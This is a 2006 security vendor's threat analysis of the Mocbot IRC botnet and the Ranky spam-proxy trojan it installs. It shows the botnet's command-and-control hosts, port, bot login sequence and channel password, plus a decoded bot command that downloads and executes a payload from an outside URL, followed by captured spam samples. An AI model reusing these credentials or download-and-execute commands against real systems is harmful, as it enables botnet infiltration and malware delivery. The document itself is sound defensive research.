Threat Analysis

Mocbot Spam Analysis

  • Release Date: August 15, 2006
  • Author: Joe Stewart

The recent Mocbot variant found exploiting the vulnerability described in MS06-040 is not especially unique. Many different malware variants use IRC as a command-and-control (C&C) channel. In this article we explore the Mocbot C&C in order to gain a better understanding of the reason for Mocbot's existence.

The C&C servers, bniu.househot.com and ypgw.wallloan.com have been published in most writeups of Mocbot. But, even if we know the correct port number for the IRC server (18067), it is inadvisable to simply connect to the server using a standard IRC client to poke around. This kind of action might get you banned from the server (if you're lucky) or DDoSsed.

The botherder can tell the difference between the bots and an interloper by noting the nickname and username of the connecting client. Bots usually generate their login information using an algorithm, so unless you are using the same algorithm, you're going to stick out like a sore thumb.

The easiest way to get the information you need to spy on the C&C without being spotted is to run the bot in a sandnet, and let it connect to a fake IRC server first. Then you can use the credentials to log in to the real server.

For Mocbot, we use the sandnet to obtain the following IRC login sequence generated by the bot:

USeR l l l lNiCK n1-e6f01a0dUSeRHOST n1-e6eb410cJOiN #n1 nert4mp1

We can then use telnet to connect to the C&C server on port 18067 and spy on the control channel.

Upon joining the control channel, "#n1", with the correct password, "nert4mp1", the botherder cannot tell the difference between us and one of the bots. However, active probing of the bot by the botherder using built-in commands could give away our presence - we could be discovered at any moment. Once again, this is risky business - don't do this unless you are prepared for the possibility of a DDoS attack on your IP address!

For now, however, we can see very little - the IRC server code has been stripped down to give almost no information to the client, except the channel topic line:

!Q gjcaekepejeocacdha

This is an encrypted command sequence, which, when decoded, reads;

i JOIN #p

The command "i" tells the bot to repeat the rest of the text back to the IRC server, causing it to now join another control channel, "#p". If we go ahead and join that channel, we see a new encrypted topic message:

!Q gfcagihehehadkcpcpgngfgegjgbcohagjhihagpgogecogdgpgncpgmdjhcgedgghcogkhagh

When decoded, the command reads:

e http://media.pixpond.com/[removed].jpg

The command "e" is an instruction to download and execute the file in the provided URL. Getting this file onto our system has been the goal all along. Antivirus scanning recognizes it as Trojan-Proxy.Win32.Ranky.fv - a spam proxy trojan.

So at this point, it seems as if this entire scheme of mass infection is simply to facilitate the sending of spam. The proxy trojan is also a bot of sorts; reporting in to a master controller to report its IP address and the socks port for use in the spam operation. If we once again mimic these operations, we can effectively join the spam proxy net, and see what is traversing it.

Using our sandnet again, we can see that the first thing the trojan does is bind to a port, and send a 4-byte UDP packet to yu.haxx.biz. Emulating this on an Internet connected network with a fake socks proxy that feeds into a blackhole SMTP server, we can infiltrate the proxy network.

Before too long, we begin to see loads of spam being pumped through our socks server, from dozens of IP addresses:


Received: from localhost ([205.158.62.242] 
helo=lwaxana.gabriel.UFPE.BR).by smtp9.
cistron.nl with esmtp (Exim 3.67 #1 (gabriel))
 <- forged.id 8AHg7h-5464bE-00; Sun, 13 Aug 
2006 17:09:11 -0800Date: Sun, 13 Aug 2006 
17:09:11 -0800From: [removed]To: [removed]Subject: 
Beauty.KrystalMessage-Id: 
<[email protected]>
*AFFAIR/SINGLES UPDATEThree women within 10 miles 
of your homeare interested in a "desperate get wild" 
date:Teressa- 110lbs, 34c, blonde, tanKrystal- 123lbs,
 36d, brown hairKylie- 128lbs, 36bb, 
dark hair & skin*Sex Depraved Housewives is a registered 
trademark.[removed].comMethod to be de-listed.[removed].com/fr1


Message-ID: Date: Sun, 13 Aug 2006 11:17:54
 -1100From: [removed]User-Agent:
 Mozilla 4.74C-CCK-MCD {C-UDP;
 EBM-APPLE} (Macintosh; U; PPC)MIME-Version: 
1.0To: [removed]Subject: it's here atContent-
Type: text/plain;.charset="us-ascii"Content-
Transfer-Encoding: 7bitMorningJust wanted to 
tell you about the gifts I just bought for my 
mom.This cyber site sells precisely what we 
have been hunting forand it gives gives you the 
first-class service you deserve.Simply check 
out the goods athttp://www.exdv.[removed].com
/iu/and tell me what you wanna purchase.looked 
on and listened in organ a sort ofwishes her 
more shell than Tsa?"single word Ata. 
They tried to get Lys note


Message-ID: <[email protected]>Date: 
Sun, 13 Aug 2006 23:24:20 +0400From: [removed]
User-Agent: Opera/7.02 (Windows ME; U)MIME-Version: 
1.0To: [removed]Subject: last wkContent-Type: 
text/plain;.charset="us-ascii"Content-Transfer-Encoding: 
7bitYoThought you wanted to know about the present 
I just bought for my brother.They've just been 
dying for a new time keeper, I just couldn't 
afford one,well that is until i came upon
http://www.eqeg.[removed].com/iu/Geez. 
This site makes me confused as to why I even trouble 
myself withmaking the voyage to the shopping center!
crisp points. And so, as night was drawingI shell will 
not harm youAfrica understand why she refused. After the first

The spam is very typical of what we see these days, the sites advertised are hawking anything from porn to fake Rolexes to pharmaceuticals:

spamsite1

Obviously there is money being made here - the economics of exploiting end-user systems for the purposes of spam has been an established business model for at least four years now.

Can your antivirus protect you from becoming part of the proxy network? Not by itself - we saw that with the release of Mocbot, only 1/3 of tested antivirus scanners detected it, even though it was little changed from the variants released over the previous six months. Another factor is the use of the IRC C&C to provide instructions to automatically download the second-stage trojan executable. If your antivirus company is not spying on these control channels on an ongoing basis, there is no way to know what malware is being installed after the initial infection. So, when you remove Mocbot from an infected system, the malware that was subsequently downloaded may go undetected for some time - which is fine with the botherder, as that's the executable they really wanted you to run anyway.

In the case of a system that has become infected with a trojan, worm or virus, unless you are a malware expert, the only way to be 100% sure the system is malware-free is to completely wipe the hard drive and reinstall the operating system. The lesson here is to not become infected in the first place - which means upgrade and patch early, and maintain several levels of defense against malware, including firewalls, antivirus, system hardening. The most important defense however, is maintaining a general awareness of the threats facing Internet users each day.

The SecureWorks research team would like to thank myNetWatchman for their valuable assistance in analyzing the Ranky trojan.

Back to more Threat Analyses and Advisories

GET THE LATEST SECURITY UPDATES

Thank you for your submission.

Talk with an Expert

Thank you for submitting the form! We have received your request. A Secureworks team member will contact you within one business day.